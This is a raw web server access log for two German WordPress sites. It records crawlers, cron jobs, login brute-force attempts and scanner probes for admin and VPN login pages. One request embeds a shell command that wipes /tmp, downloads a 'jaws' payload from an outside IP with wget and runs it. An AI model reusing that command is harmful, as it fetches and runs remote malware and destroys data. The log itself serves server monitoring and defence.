17.241.219.0 - - [07/Nov/2023:04:49:12 +0100] "GET /wp-content/themes/lhst/lib/js/jquery-smoothscroll.min.js HTTP/1.1" 200 2546 "https://www.ipcbusiness.de/ru/unsere-produkte-und-services/innovative-ladeeinheiten/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.241.219.0 - - [07/Nov/2023:04:49:13 +0100] "GET /wp-content/plugins/js_composer/assets/js/dist/js_composer_front.min.js HTTP/1.1" 200 5816 "https://www.ipcbusiness.de/ru/unsere-produkte-und-services/innovative-ladeeinheiten/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.241.75.0 - - [07/Nov/2023:04:49:13 +0100] "GET /wp-includes/js/wp-embed.min.js HTTP/1.1" 200 804 "https://www.ipcbusiness.de/ru/unsere-produkte-und-services/innovative-ladeeinheiten/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
:: - - [07/Nov/2023:04:49:19 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 (internal dummy connection)"
62.138.2.0 - - [07/Nov/2023:04:49:27 +0100] "GET /es/unsere-maerkte/ HTTP/1.1" 200 10974 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
106.227.49.0 - - [07/Nov/2023:04:50:23 +0100] "GET / HTTP/1.1" 403 2409 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
34.75.65.0 - - [07/Nov/2023:04:52:44 +0100] "POST /wp-login.php HTTP/1.1" 503 7311 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36"
81.169.178.0 - - [07/Nov/2023:04:52:44 +0100] "POST /wp-cron.php?doing_wp_cron=1699329164.7981250286102294921875 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1699329164.7981250286102294921875" "WordPress/5.2.19; https://www.computerdoc24.de"
81.169.178.0 - - [07/Nov/2023:04:52:55 +0100] "POST /wp-cron.php?doing_wp_cron=1699329175.8410499095916748046875 HTTP/1.1" 200 - "https://www.ipcbusiness.de/wp-cron.php?doing_wp_cron=1699329175.8410499095916748046875" "WordPress/5.8.8; https://www.ipcbusiness.de/en"
161.35.185.0 - - [07/Nov/2023:04:52:55 +0100] "GET /en HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
192.36.109.0 - - [07/Nov/2023:04:57:24 +0100] "GET /robots.txt HTTP/1.1" 301 241 "-" "Mozilla/5.0 (Linux; Android 8.1.0; jhs561 Build/GIADA.eng.zc.20200922.153858; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/81.0.4044.138 Safari/537.36"
192.36.109.0 - - [07/Nov/2023:04:57:24 +0100] "GET /robots.txt HTTP/1.1" 200 - "http://ipcbusiness.de/robots.txt" "Mozilla/5.0 (Linux; Android 8.1.0; jhs561 Build/GIADA.eng.zc.20200922.153858; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/81.0.4044.138 Safari/537.36"
192.36.109.0 - - [07/Nov/2023:04:57:24 +0100] "GET /robots.txt HTTP/1.1" 200 69 "https://ipcbusiness.de/robots.txt" "Mozilla/5.0 (Linux; Android 8.1.0; jhs561 Build/GIADA.eng.zc.20200922.153858; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/81.0.4044.138 Safari/537.36"
192.36.109.0 - - [07/Nov/2023:04:57:24 +0100] "GET /humans.txt HTTP/1.1" 301 241 "-" "Mozilla/5.0 (Linux; Android 8.1.0; jhs561 Build/GIADA.eng.zc.20200922.153858; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/81.0.4044.138 Safari/537.36"
192.36.109.0 - - [07/Nov/2023:04:57:24 +0100] "GET /humans.txt HTTP/1.1" 200 - "http://ipcbusiness.de/humans.txt" "Mozilla/5.0 (Linux; Android 8.1.0; jhs561 Build/GIADA.eng.zc.20200922.153858; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/81.0.4044.138 Safari/537.36"
192.36.109.0 - - [07/Nov/2023:04:57:25 +0100] "GET /humans.txt HTTP/1.1" 200 9952 "https://ipcbusiness.de/humans.txt" "Mozilla/5.0 (Linux; Android 8.1.0; jhs561 Build/GIADA.eng.zc.20200922.153858; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/81.0.4044.138 Safari/537.36"
192.36.109.0 - - [07/Nov/2023:04:57:25 +0100] "GET /ads.txt HTTP/1.1" 301 238 "-" "Mozilla/5.0 (Linux; Android 8.1.0; jhs561 Build/GIADA.eng.zc.20200922.153858; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/81.0.4044.138 Safari/537.36"
192.36.109.0 - - [07/Nov/2023:04:57:25 +0100] "GET /ads.txt HTTP/1.1" 200 - "http://ipcbusiness.de/ads.txt" "Mozilla/5.0 (Linux; Android 8.1.0; jhs561 Build/GIADA.eng.zc.20200922.153858; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/81.0.4044.138 Safari/537.36"
192.36.109.0 - - [07/Nov/2023:04:57:25 +0100] "GET /ads.txt HTTP/1.1" 200 9948 "https://ipcbusiness.de/ads.txt" "Mozilla/5.0 (Linux; Android 8.1.0; jhs561 Build/GIADA.eng.zc.20200922.153858; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/81.0.4044.138 Safari/537.36"
192.36.109.0 - - [07/Nov/2023:04:57:26 +0100] "GET / HTTP/1.1" 301 231 "-" "Mozilla/5.0 (Linux; Android 8.1.0; jhs561 Build/GIADA.eng.zc.20200922.153858; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/81.0.4044.138 Safari/537.36"
192.36.109.0 - - [07/Nov/2023:04:57:26 +0100] "GET / HTTP/1.1" 301 - "http://ipcbusiness.de/" "Mozilla/5.0 (Linux; Android 8.1.0; jhs561 Build/GIADA.eng.zc.20200922.153858; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/81.0.4044.138 Safari/537.36"
192.36.109.0 - - [07/Nov/2023:04:57:26 +0100] "GET / HTTP/1.1" 200 16122 "https://ipcbusiness.de/" "Mozilla/5.0 (Linux; Android 8.1.0; jhs561 Build/GIADA.eng.zc.20200922.153858; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/81.0.4044.138 Safari/537.36"
62.138.2.0 - - [07/Nov/2023:04:57:46 +0100] "GET /robots.txt HTTP/1.1" 200 69 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
62.138.2.0 - - [07/Nov/2023:04:57:46 +0100] "GET /ueber-uns/firmeninformation/ HTTP/1.1" 200 9946 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
195.191.219.0 - - [07/Nov/2023:04:58:23 +0100] "GET /robots.txt HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
195.191.219.0 - - [07/Nov/2023:04:58:26 +0100] "GET / HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
206.189.22.0 - - [07/Nov/2023:05:02:34 +0100] "\x16\x03\x01\x01\xfc\x01" 400 226 "-" "-"
135.181.123.0 - - [07/Nov/2023:05:05:52 +0100] "HEAD / HTTP/1.1" 301 - "https://www.diebewertung.de" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.34 Safari/537.36"
35.176.196.0 - - [07/Nov/2023:05:11:24 +0100] "GET /favicon.ico HTTP/1.1" 404 2557 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
209.38.244.0 - - [07/Nov/2023:05:12:56 +0100] "GET / HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
209.38.244.0 - - [07/Nov/2023:05:12:56 +0100] "GET / HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
81.169.178.0 - - [07/Nov/2023:05:12:57 +0100] "GET / HTTP/1.1" 200 16117 "https://www.ipcbusiness.de/" "WordPress/5.8.8; https://www.ipcbusiness.de"
81.169.178.0 - - [07/Nov/2023:05:12:57 +0100] "POST /wp-cron.php?doing_wp_cron=1699330377.6683490276336669921875 HTTP/1.1" 200 - "https://www.ipcbusiness.de/wp-cron.php?doing_wp_cron=1699330377.6683490276336669921875" "WordPress/5.8.8; https://www.ipcbusiness.de"
62.138.2.0 - - [07/Nov/2023:05:12:57 +0100] "GET /robots.txt HTTP/1.1" 200 69 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
62.138.2.0 - - [07/Nov/2023:05:12:58 +0100] "GET /uk/unsere-maerkte/ HTTP/1.1" 200 11273 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
15.204.183.0 - - [07/Nov/2023:05:13:04 +0100] "GET / HTTP/1.1" 200 2691 "-" "-"
35.176.196.0 - - [07/Nov/2023:05:13:05 +0100] "GET /favicon.ico HTTP/1.1" 404 2557 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
183.56.248.0 - - [07/Nov/2023:05:14:01 +0100] "GET / HTTP/1.1" 403 2409 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
35.176.196.0 - - [07/Nov/2023:05:14:33 +0100] "GET /api/v1/charts HTTP/1.1" 404 2561 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
35.176.196.0 - - [07/Nov/2023:05:16:49 +0100] "GET /api/v1/charts HTTP/1.1" 404 2561 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
35.176.196.0 - - [07/Nov/2023:05:18:50 +0100] "GET /cgi-bin/login.cgi HTTP/1.1" 404 2569 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
81.169.178.0 - - [07/Nov/2023:05:20:29 +0100] "POST /wp-cron.php?doing_wp_cron=1699330829.7727909088134765625000 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1699330829.7727909088134765625000" "WordPress/5.2.19; https://www.computerdoc24.de"
89.246.241.0 - - [07/Nov/2023:05:20:29 +0100] "GET /product/logitech-speaker-s-120-2-0-23w-rms/ HTTP/1.1" 200 15878 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0"
81.169.178.0 - - [07/Nov/2023:05:20:30 +0100] "POST /wp-admin/admin-ajax.php?action=wp_1_wc_privacy_cleanup&nonce=cb77602e3d HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-admin/admin-ajax.php?action=wp_1_wc_privacy_cleanup&nonce=cb77602e3d" "WordPress/5.2.19; https://www.computerdoc24.de"
35.176.196.0 - - [07/Nov/2023:05:20:34 +0100] "GET /cgi-bin/login.cgi HTTP/1.1" 404 2569 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
81.169.178.0 - - [07/Nov/2023:05:21:59 +0100] "POST /wp-cron.php?doing_wp_cron=1699330919.8154189586639404296875 HTTP/1.1" 200 - "https://www.ipcbusiness.de/wp-cron.php?doing_wp_cron=1699330919.8154189586639404296875" "WordPress/5.8.8; https://www.ipcbusiness.de"
138.197.6.0 - - [07/Nov/2023:05:21:59 +0100] "POST /wp-login.php HTTP/1.1" 503 7324 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
35.176.196.0 - - [07/Nov/2023:05:22:06 +0100] "GET /+CSCOE+/logon.html HTTP/1.1" 404 2571 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
35.176.196.0 - - [07/Nov/2023:05:24:48 +0100] "GET /+CSCOE+/logon.html HTTP/1.1" 404 2571 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
35.176.196.0 - - [07/Nov/2023:05:26:38 +0100] "GET /doc/page/login.asp HTTP/1.1" 404 2571 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
35.176.196.0 - - [07/Nov/2023:05:29:16 +0100] "GET /doc/page/login.asp HTTP/1.1" 404 2571 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
81.169.178.0 - - [07/Nov/2023:05:29:28 +0100] "POST /?wordfence_syncAttackData=1699331368.0046 HTTP/1.1" 200 - "https://www.ipcbusiness.de/?wordfence_syncAttackData=1699331368.0046" "WordPress/5.8.8; https://www.ipcbusiness.de"
81.169.178.0 - - [07/Nov/2023:05:29:28 +0100] "POST /wp-cron.php?doing_wp_cron=1699331368.4125840663909912109375 HTTP/1.1" 200 - "https://www.ipcbusiness.de/wp-cron.php?doing_wp_cron=1699331368.4125840663909912109375" "WordPress/5.8.8; https://www.ipcbusiness.de"
185.196.220.0 - - [07/Nov/2023:05:29:27 +0100] "GET /wp-content/plugins/ketchup-restaurant-reservations/readme.txt HTTP/1.1" 200 9973 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
35.176.196.0 - - [07/Nov/2023:05:31:29 +0100] "GET /users/sign_in HTTP/1.1" 404 2561 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
192.241.232.0 - - [07/Nov/2023:05:31:29 +0100] "MGLNDD_81.169.178.78_80\n" 400 226 "-" "-"
61.219.11.0 - - [07/Nov/2023:05:33:45 +0100] "GET / HTTP/1.0" 400 362 "-" "-"
35.176.196.0 - - [07/Nov/2023:05:34:13 +0100] "GET /users/sign_in HTTP/1.1" 404 2561 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
61.219.11.0 - - [07/Nov/2023:05:34:50 +0100] "GET / HTTP/1.0" 400 362 "-" "-"
35.176.196.0 - - [07/Nov/2023:05:36:14 +0100] "GET /webconsole/webpages/login.jsp HTTP/1.1" 404 2593 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
141.98.11.0 - - [07/Nov/2023:05:36:51 +0100] "GET / HTTP/1.1" 403 2409 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
35.176.196.0 - - [07/Nov/2023:05:38:37 +0100] "GET /webconsole/webpages/login.jsp HTTP/1.1" 404 2593 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
83.97.73.0 - - [07/Nov/2023:05:39:52 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 403 2411 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
35.176.196.0 - - [07/Nov/2023:05:40:54 +0100] "GET /login/?next=/ HTTP/1.1" 404 2561 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
85.209.11.0 - - [07/Nov/2023:05:42:10 +0100] "GET / HTTP/1.0" 200 2691 "http://retractor.eu/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
35.176.196.0 - - [07/Nov/2023:05:43:13 +0100] "GET /login/?next=/ HTTP/1.1" 404 2561 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
45.33.80.0 - - [07/Nov/2023:05:44:53 +0100] "GET / HTTP/1.1" 403 2411 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
35.176.196.0 - - [07/Nov/2023:05:45:11 +0100] "GET /admin/index.html HTTP/1.1" 404 2567 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
35.176.196.0 - - [07/Nov/2023:05:47:49 +0100] "GET /admin/index.html HTTP/1.1" 404 2567 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
62.138.2.0 - - [07/Nov/2023:05:47:58 +0100] "GET /robots.txt HTTP/1.1" 200 69 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
62.138.2.0 - - [07/Nov/2023:05:48:00 +0100] "GET /en/unsere-maerkte/ HTTP/1.1" 200 10883 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
81.169.178.0 - - [07/Nov/2023:05:47:58 +0100] "POST /wp-cron.php?doing_wp_cron=1699332478.7240738868713378906250 HTTP/1.1" 200 - "https://www.ipcbusiness.de/wp-cron.php?doing_wp_cron=1699332478.7240738868713378906250" "WordPress/5.8.8; https://www.ipcbusiness.de"
195.191.219.0 - - [07/Nov/2023:05:48:10 +0100] "GET /robots.txt HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
195.191.219.0 - - [07/Nov/2023:05:48:11 +0100] "GET / HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
195.191.219.0 - - [07/Nov/2023:05:48:12 +0100] "GET /robots.txt HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
195.191.219.0 - - [07/Nov/2023:05:48:14 +0100] "GET / HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
35.176.196.0 - - [07/Nov/2023:05:49:36 +0100] "GET /global-protect/login.esp HTTP/1.1" 404 2583 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
184.94.240.0 - - [07/Nov/2023:05:49:52 +0100] "GET / HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0"
84.17.58.0 - - [07/Nov/2023:05:50:11 +0100] "GET / HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
35.176.196.0 - - [07/Nov/2023:05:52:17 +0100] "GET /global-protect/login.esp HTTP/1.1" 404 2583 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
45.33.80.0 - - [07/Nov/2023:05:52:49 +0100] "\x16\x03\x01" 400 226 "-" "-"
35.176.196.0 - - [07/Nov/2023:05:54:10 +0100] "GET /doc/script/lib/seajs/config/sea-config.js HTTP/1.1" 404 2617 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
81.169.178.0 - - [07/Nov/2023:05:55:33 +0100] "POST /wp-cron.php?doing_wp_cron=1699332933.2946588993072509765625 HTTP/1.1" 200 - "https://www.ipcbusiness.de/wp-cron.php?doing_wp_cron=1699332933.2946588993072509765625" "WordPress/5.8.8; https://www.ipcbusiness.de/es"
62.138.2.0 - - [07/Nov/2023:05:55:33 +0100] "GET /es/unsere-produkte-und-services/digitale-loesungen-ueberwachung-der-ladeeinheiten/ HTTP/1.1" 200 11174 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
35.176.196.0 - - [07/Nov/2023:05:56:45 +0100] "GET /doc/script/lib/seajs/config/sea-config.js HTTP/1.1" 404 2617 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
62.141.44.0 - - [07/Nov/2023:05:56:53 +0100] "GET / HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.54"
35.176.196.0 - - [07/Nov/2023:05:58:46 +0100] "GET /manage/account/login HTTP/1.1" 404 2575 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
62.138.2.0 - - [07/Nov/2023:06:00:31 +0100] "GET /es/linieninformationen/ HTTP/1.1" 200 12536 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
35.176.196.0 - - [07/Nov/2023:06:01:15 +0100] "GET /manage/account/login HTTP/1.1" 404 2575 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.254.253.0 - - [07/Nov/2023:06:01:44 +0100] "GET / HTTP/1.1" 301 231 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
3.254.253.0 - - [07/Nov/2023:06:01:48 +0100] "GET /robots.txt HTTP/1.1" 200 - "http://ipcbusiness.de/robots.txt" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
41.239.219.0 - - [07/Nov/2023:06:03:12 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+91.92.243.35/jaws;sh+/tmp/jaws HTTP/1.1" 200 2691 "-" "Hello, world"
35.176.196.0 - - [07/Nov/2023:06:03:30 +0100] "GET /login.rsp HTTP/1.1" 404 2553 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
185.118.196.0 - - [07/Nov/2023:06:04:24 +0100] "POST /wp-login.php HTTP/1.1" 503 7325 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36"
35.176.196.0 - - [07/Nov/2023:06:05:38 +0100] "GET /login.rsp HTTP/1.1" 404 2553 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
54.36.148.0 - - [07/Nov/2023:06:06:55 +0100] "GET /html/impressum.html HTTP/1.1" 200 3769 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.0 - - [07/Nov/2023:06:06:58 +0100] "GET /subheader_r.gif HTTP/1.1" 200 1036 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.0 - - [07/Nov/2023:06:06:59 +0100] "GET /subheader_l.gif HTTP/1.1" 200 2832 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.149.0 - - [07/Nov/2023:06:06:59 +0100] "GET /assets/images/autogen/clearpixel.gif HTTP/1.1" 200 43 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.0 - - [07/Nov/2023:06:07:00 +0100] "GET /header_l.gif HTTP/1.1" 200 7358 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.0 - - [07/Nov/2023:06:07:00 +0100] "GET /assets/rollover.js HTTP/1.1" 200 5145 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.0 - - [07/Nov/2023:06:07:01 +0100] "GET /html/fusion.css HTTP/1.1" 200 1161 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.0 - - [07/Nov/2023:06:07:01 +0100] "GET /subheader_br.gif HTTP/1.1" 200 1693 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.0 - - [07/Nov/2023:06:07:01 +0100] "GET /assets/images/autogen/Kontakt_Nregular_1_1.gif HTTP/1.1" 200 1596 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.149.0 - - [07/Nov/2023:06:07:02 +0100] "GET /subheader_bl.gif HTTP/1.1" 200 1883 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.0 - - [07/Nov/2023:06:07:02 +0100] "GET /html/site.css HTTP/1.1" 200 88 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.0 - - [07/Nov/2023:06:07:08 +0100] "GET /kv_none_poetic_cream_none_1.gif HTTP/1.1" 200 248 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.0 - - [07/Nov/2023:06:07:08 +0100] "GET /assets/images/autogen/Referenzen_Nregular_1_1.gif HTTP/1.1" 200 1249 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.0 - - [07/Nov/2023:06:07:09 +0100] "GET /assets/images/autogen/Vorher-Nachher_Nregular_1_1.gif HTTP/1.1" 200 1718 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.0 - - [07/Nov/2023:06:07:09 +0100] "GET /assets/images/autogen/Anfahrtskosten_Nregular_1_1.gif HTTP/1.1" 200 1732 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.0 - - [07/Nov/2023:06:07:09 +0100] "GET /assets/images/autogen/Impressum_Hhighlighted_1_1.gif HTTP/1.1" 200 1287 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
35.176.196.0 - - [07/Nov/2023:06:07:37 +0100] "GET /Login.html HTTP/1.1" 404 2555 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
81.169.178.0 - - [07/Nov/2023:06:07:51 +0100] "POST /wp-cron.php?doing_wp_cron=1699333671.0789470672607421875000 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1699333671.0789470672607421875000" "WordPress/5.2.19; https://www.computerdoc24.de"
39.101.185.0 - - [07/Nov/2023:06:07:50 +0100] "POST /wp-login.php HTTP/1.1" 503 7312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36"
35.176.196.0 - - [07/Nov/2023:06:10:10 +0100] "GET /Login.html HTTP/1.1" 404 2555 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
207.46.13.0 - - [07/Nov/2023:06:11:05 +0100] "GET /robots.txt HTTP/1.1" 301 295 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
207.46.13.0 - - [07/Nov/2023:06:11:05 +0100] "GET /robots.txt HTTP/1.1" 301 295 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
52.167.144.0 - - [07/Nov/2023:06:11:19 +0100] "GET /robots.txt HTTP/1.1" 301 295 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
40.77.167.0 - - [07/Nov/2023:06:11:26 +0100] "GET / HTTP/1.1" 301 285 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
35.176.196.0 - - [07/Nov/2023:06:11:53 +0100] "GET /login.html HTTP/1.1" 404 2555 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
195.191.219.0 - - [07/Nov/2023:06:12:58 +0100] "GET /robots.txt HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
195.191.219.0 - - [07/Nov/2023:06:13:02 +0100] "GET / HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
35.176.196.0 - - [07/Nov/2023:06:14:32 +0100] "GET /login.html HTTP/1.1" 404 2555 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
208.100.26.0 - - [07/Nov/2023:06:15:01 +0100] "GET / HTTP/1.1" 301 231 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.4101.79 Safari/537.36"
